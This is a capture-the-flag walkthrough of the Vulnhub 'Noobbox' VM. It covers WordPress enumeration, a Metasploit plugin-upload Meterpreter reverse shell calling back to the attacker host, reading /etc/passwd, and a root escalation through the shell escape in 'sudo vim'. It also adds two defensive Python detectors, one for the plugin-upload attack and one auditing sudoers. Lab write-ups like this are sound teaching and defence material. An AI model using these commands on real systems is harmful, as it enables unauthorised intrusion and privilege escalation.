Vulnhub: Noobbox
2021-08-25 14:05:08
1. Finding the target
The target is identified as 192.168.1.109.
┌──(root💀kali)-[~]
└─# nmap 192.168.1.1/24 -p80
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-25 17:11 CST
Nmap scan report for 192.168.1.1
Host is up (0.00036s latency).
PORT STATE SERVICE
80/tcp open http
MAC Address: 80:8F:1D:FB:77:E0 (Tp-link Technologies)
Nmap scan report for 192.168.1.109
Host is up (0.00019s latency).
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:1C:F6:FC (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.1.150
Host is up (0.00019s latency).
PORT STATE SERVICE
80/tcp filtered http
MAC Address: 04:92:26:CF:9D:F1 (Asustek Computer)
Nmap scan report for 192.168.1.106
Host is up (0.000035s latency).
PORT STATE SERVICE
80/tcp closed http
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.08 seconds
2. Scanning and analysing the target
The target is found to be running WordPress.
┌──(root💀kali)-[~]
└─# nmap -sC -A 192.168.1.109
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-25 17:13 CST
Nmap scan report for 192.168.1.109
Host is up (0.00023s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:1C:F6:FC (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=8/25%OT=80%CT=1%CU=41701%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=612609C0%P=x86_64-pc-linux-gnu)SEQ(SP=109%GCD=1%ISR=10A%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O
OS:5=M5B4ST11NW6%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.23 ms 192.168.1.109
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.09 seconds
Web directory scan.
┌──(root💀kali)-[~]
└─# nmap --script=http-enum 192.168.1.109
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-25 17:16 CST
Nmap scan report for 192.168.1.109
Host is up (0.00018s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /wordpress/: Blog
| /wordpress/wp-login.php: Wordpress login page.
|_ /manual/: Potentially interesting folder
MAC Address: 08:00:27:1C:F6:FC (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 10.72 seconds
3. Enumerating WordPress users
The user noobbox is found.
(The command wpscan -e u --url 192.168.1.109/wordpress can also be used for this scan.)
┌──(root💀kali)-[~]
└─# nmap --script=http-wordpress-users --script-args=basepath=/wordpress/ 192.168.1.109
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-25 14:02 CST
Nmap scan report for 192.168.1.109
Host is up (0.00011s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
80/tcp open http
| http-wordpress-users:
| Username found: noobbox
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
MAC Address: 08:00:27:1C:F6:FC (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.57 seconds
4. Scanning for website images
The file img.jpg is found; downloading it or opening it in a browser reveals the string 5p4c3, which is guessed to be the password.
┌──(root💀kali)-[~]
└─# ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://192.168.1.109/FUZZ -e .jpg,.png,.jpeg,.gif -of html
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.1.109/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Extensions : .jpg .png .jpeg .gif
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
.hta [Status: 403, Size: 278, Words: 20, Lines: 10]
.htaccess [Status: 403, Size: 278, Words: 20, Lines: 10]
.hta.gif [Status: 403, Size: 278, Words: 20, Lines: 10]
.htaccess.png [Status: 403, Size: 278, Words: 20, Lines: 10]
.htaccess.jpg [Status: 403, Size: 278, Words: 20, Lines: 10]
.hta.jpeg [Status: 403, Size: 278, Words: 20, Lines: 10]
.hta.png [Status: 403, Size: 278, Words: 20, Lines: 10]
.hta.jpg [Status: 403, Size: 278, Words: 20, Lines: 10]
.htpasswd.gif [Status: 403, Size: 278, Words: 20, Lines: 10]
.htpasswd.jpeg [Status: 403, Size: 278, Words: 20, Lines: 10]
.htpasswd.png [Status: 403, Size: 278, Words: 20, Lines: 10]
.htpasswd.jpg [Status: 403, Size: 278, Words: 20, Lines: 10]
.htpasswd [Status: 403, Size: 278, Words: 20, Lines: 10]
.htaccess.gif [Status: 403, Size: 278, Words: 20, Lines: 10]
.htaccess.jpeg [Status: 403, Size: 278, Words: 20, Lines: 10]
img.jpg [Status: 200, Size: 4811, Words: 21, Lines: 29]
index.html [Status: 200, Size: 10701, Words: 3427, Lines: 369]
manual [Status: 301, Size: 315, Words: 20, Lines: 10]
server-status [Status: 403, Size: 278, Words: 20, Lines: 10]
wordpress [Status: 301, Size: 318, Words: 20, Lines: 10]
:: Progress: [23430/23430] :: Job [1/1] :: 133 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
5. Obtaining a Meterpreter reverse shell
Enter the console with msfconsole.
Configure the module as follows and run it.
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts 192.168.1.109
rhosts => 192.168.1.109
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /wordpress
targeturi => /wordpress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username noobbox
username => noobbox
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password 5p4c3
password => 5p4c3
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 192.168.1.106:4444
[*] Authenticating with WordPress using noobbox:5p4c3...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wordpress/wp-content/plugins/nmyzoxoRan/eodxjTkwnQ.php...
[*] Sending stage (39282 bytes) to 192.168.1.109
[+] Deleted eodxjTkwnQ.php
[+] Deleted nmyzoxoRan.php
[+] Deleted ../nmyzoxoRan
[*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.109:45880) at 2021-08-25 14:58:40 +0800
meterpreter > sysinfo
Computer : N00bBox
OS : Linux N00bBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)
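The module output above shows the attacker's cleanup ("Deleted eodxjTkwnQ.php"), so the durable evidence of this technique is the web server log: an authenticated plugin upload followed almost immediately by a request to a PHP file in a plugin directory the site never installed. The following detector is an added example written for this page, not part of the original walkthrough; the log lines, the plugin allowlist (KNOWN_PLUGINS) and the time window are constructed assumptions.

```python
import re
from datetime import datetime

# Constructed Apache access-log sample (not from the page) modelled on the
# request sequence wp_admin_shell_upload produces: login, plugin upload, then
# a hit on the new plugin directory. The last line is benign plugin traffic.
SAMPLE_LOG = """\
192.168.1.106 - - [25/Aug/2021:14:58:38 +0800] "POST /wordpress/wp-login.php HTTP/1.1" 302 0
192.168.1.106 - - [25/Aug/2021:14:58:39 +0800] "POST /wordpress/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 4210
192.168.1.106 - - [25/Aug/2021:14:58:40 +0800] "GET /wordpress/wp-content/plugins/nmyzoxoRan/eodxjTkwnQ.php HTTP/1.1" 200 0
192.168.1.50 - - [25/Aug/2021:15:02:11 +0800] "GET /wordpress/wp-content/plugins/akismet/akismet.js HTTP/1.1" 200 913
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_RE = re.compile(r'/wp-admin/update\.php\?action=upload-plugin')
PLUGIN_PHP_RE = re.compile(r'/wp-content/plugins/(?P<dir>[^/]+)/[^/]+\.php$')

# Plugin directories the site legitimately runs (assumed allowlist).
KNOWN_PLUGINS = {"akismet", "hello"}

def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))

def find_plugin_upload_rce(log_text, window_s=60):
    """Return (ip, plugin_dir, path) for each PHP file executed from an unknown
    plugin directory within window_s seconds of a plugin upload by the same client."""
    last_upload = {}  # ip -> time of that client's most recent plugin upload
    hits = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        if method == "POST" and UPLOAD_RE.search(path):
            last_upload[ip] = ts
            continue
        m = PLUGIN_PHP_RE.search(path)
        if m and m.group("dir") not in KNOWN_PLUGINS and ip in last_upload:
            if (ts - last_upload[ip]).total_seconds() <= window_s:
                hits.append((ip, m.group("dir"), path))
    return hits
```

Running it over a real access log only needs the allowlist filled in from the site's wp-content/plugins listing; the same pairing (upload then execute) also applies to theme uploads if the regexes are extended.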
6. Obtaining the flag under user noobbox
meterpreter > cd /home
meterpreter > ls
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2021-03-10 18:44:30 +0800 noobbox
meterpreter > cd noobbox
meterpreter > ls
Listing: /home/noobbox
======================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 220 fil 2021-03-06 15:25:32 +0800 .bash_logout
100644/rw-r--r-- 3526 fil 2021-03-06 15:25:32 +0800 .bashrc
40755/rwxr-xr-x 4096 dir 2021-03-10 18:38:26 +0800 .local
100755/rwxr-xr-x 807 fil 2021-03-06 15:25:32 +0800 .profile
100600/rw------- 672 fil 2021-03-10 13:22:31 +0800 .viminfo
100644/rw-r--r-- 47 fil 2021-03-10 13:31:14 +0800 user.txt
meterpreter > cat user.txt
USER FLAG : {e7028891afea8df6164a35880cc7e2e5}
meterpreter >
7. Obtaining root privileges
Get a shell and use python to spawn a TTY shell.
meterpreter > shell
Process 721 created.
Channel 0 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
whoami
www-data
python -c 'import pty; pty.spawn("/bin/sh")'
sh: 0: getcwd() failed: No such file or directory
$ whoami
whoami
www-data
$
View the user list. It shows that the login shell for noobbox is rbash.
$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/rbash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
noobbox:x:1000:1000:noobbox,,,:/home/noobbox:/bin/rbash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:107:115:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
$
Switch to user noobbox and check the permissions.
This shows that user noobbox can run /usr/bin/vim with sudo.
$ su noobbox
su noobbox
Password: 5p4c3
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
noobbox@N00bBox:$ sudo -l
sudo -l
[sudo] password for noobbox: 5p4c3
Matching Defaults entries for noobbox on N00bBox:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User noobbox may run the following commands on N00bBox:
(ALL : ALL) /usr/bin/vim
noobbox@N00bBox:$
Break out of the rbash restriction.
noobbox@N00bBox:$ sudo /usr/bin/vim -c ':!/bin/bash'
:!/bin/bash
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@N00bBox:.#
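The rule "(ALL : ALL) /usr/bin/vim" is the whole privilege-escalation path here: any program that can spawn a subprocess (vim's ":!" above) turns a "single command" sudo rule into a root shell, and the usual fix is to grant sudoedit for the specific file instead. The sudoers audit below is an added example for this page, not code from the walkthrough; the sample sudoers text and the SHELL_ESCAPE_CMDS list are constructed assumptions.

```python
import re

# Commands that give the caller an interactive shell when run under sudo
# (vim's ":!" is the one used on this box). Assumed list, not exhaustive.
SHELL_ESCAPE_CMDS = {"vim", "vi", "nano", "less", "more", "man",
                     "python", "python3", "perl", "bash", "sh"}

# Constructed sudoers sample (not the box's real file); the noobbox rule
# mirrors the `sudo -l` output above.
SAMPLE_SUDOERS = """\
Defaults env_reset, mail_badpass
# user  host=(runas) [tags:] commands
root    ALL=(ALL:ALL) ALL
noobbox ALL=(ALL:ALL) /usr/bin/vim
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
www-data ALL=(root) sudoedit /etc/motd
"""

RULE_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*'
    r'(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$'
)

def audit_sudoers(text):
    """Return [(user, command, reason)] for rules that deserve a second look."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blanks
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user, tags, cmds = m.group("user"), m.group("tags"), m.group("cmds")
        for cmd in (c.strip() for c in cmds.split(",")):
            name = cmd.split()[0].rsplit("/", 1)[-1]   # basename of the program
            if cmd == "ALL":
                findings.append((user, cmd, "unrestricted sudo"))
            elif name in SHELL_ESCAPE_CMDS:
                findings.append((user, cmd, "shell escape; use sudoedit for file edits"))
            if "NOPASSWD" in tags:
                findings.append((user, cmd, "no password required"))
    return findings
```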
Change to /root to get the flag.
root@N00bBox:~# cd /root
cd /root
root@N00bBox:~# ls
ls
root.txt
root@N00bBox:~# cat root.txt
cat root.txt
ROOT FLAG : {a4c45279eaad84e5bb8ae0dfc5034400}
root@N00bBox:~#